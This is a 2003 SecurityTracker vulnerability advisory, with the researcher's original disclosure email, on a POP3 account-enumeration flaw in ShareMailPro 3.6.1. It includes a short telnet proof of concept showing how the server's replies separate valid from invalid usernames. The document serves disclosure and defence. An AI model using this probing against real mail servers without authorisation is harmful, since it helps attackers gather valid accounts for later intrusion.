ShareMailPro Discloses Valid Account Names to Remote Users
|
|
SecurityTracker Alert ID: 1006806 |
|
SecurityTracker URL: http://securitytracker.com/id/1006806
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 21 2003
|
Impact:
Disclosure of user information
|
Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 3.6.1
|
Description:
Ziv Kamir reported another vulnerability in ShareMailPro. A remote user can determine if a specified user account name exists on the system.
It is reported that a remote user can query the POP3 interface to determine if a particular user account exists or not. If the specified user does not exist, the server will respond with:
-ERR sorry , no such mailbox
If the specified user exists, the server will respond with:
+OK check your mailbox
|
Impact:
A remote user can determine valid user accounts on the system.
|
Solution:
No solution was available at the time of this entry. The vendor has reportedly responded to indicate that they plan to fix this vulnerability.
|
Vendor URL: www.lavasoftware.net/en/content/shmailpro/overview.htm (Links to External Site)
|
Cause:
Access control error, State error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 20 May 2003 13:04:23 -0700 (PDT)
Subject: Vulnerability in the ShareMailPro Ver 3.6.1 Under The Pop3 Service
|
This is a multi-part message in MIME format.
--------------010401070909000004050709
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi ,
Attach Txt File With Explain .
------------------------------------------------------------------------
Do you Yahoo!?
The New Yahoo! Search
<http://us.rd.yahoo.com/search/mailsig/*http://search.yahoo.com> -
Faster. Easier. Bingo.
--------------010401070909000004050709
Content-Type: text/plain;
name="ShareMailPro.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="ShareMailPro.txt"
19/05/03
Ziv Kamir
---------
-------------------------------------------------------
Application: ShareMailPro
Web Site: http://www.lavasoftware.net
Versions: 3.6.1
Platform: Windows
Bug: Obtain a List Of Valid Users Under The Pop3 Service .
Credits:
########
#################################
# #
# Ziv Kamir #
# #
# Email : vulncode@yahoo.com #
# #
# #
#################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
===============
1) Introduction
===============
ShareMailPro is an E-mail server. With one domain name and a public mailbox, ShareMailPro provides your company
email service as a email server. as well as a local email server. It just fits for SOHO, offering efficiency and cost-effectiveness
without compromising security and flexibility.
=======
2) Bug
=======
Any remote attacker can obtain a list of Valid Users from the server
The Server will act Different for Valid user and for not a valid one .
The Service That Suffers from the Vulnerability is POP3 .
===========
3) The Code
===========
Not Valid User ( The Username Is Not_Valid_User )
--------------------------------------------------
C:> Telnet The_Smtp_Server_IP_Address 110
+OK ShareMailPro POP3 Server Ready
user Not_Valid_User
-ERR sorry , no such mailbox ( This is the response )
Valid User ( The Username Is Hack )
-----------------------------------
C:> Telnet The_Smtp_Server_IP_Address 110
+OK ShareMailPro POP3 Server Ready
user Hack
+OK check your mailbox ( This is the response )
======
4) Fix
======
Date of Vendor Notification:
19-05-03
Status:
Thay Will Fix this security hole.
===========================================================
*** The Data is for educational purpose only. ***
===========================================================
Ziv Kamir
vulncode@yahoo.com
--------------010401070909000004050709--
|
|
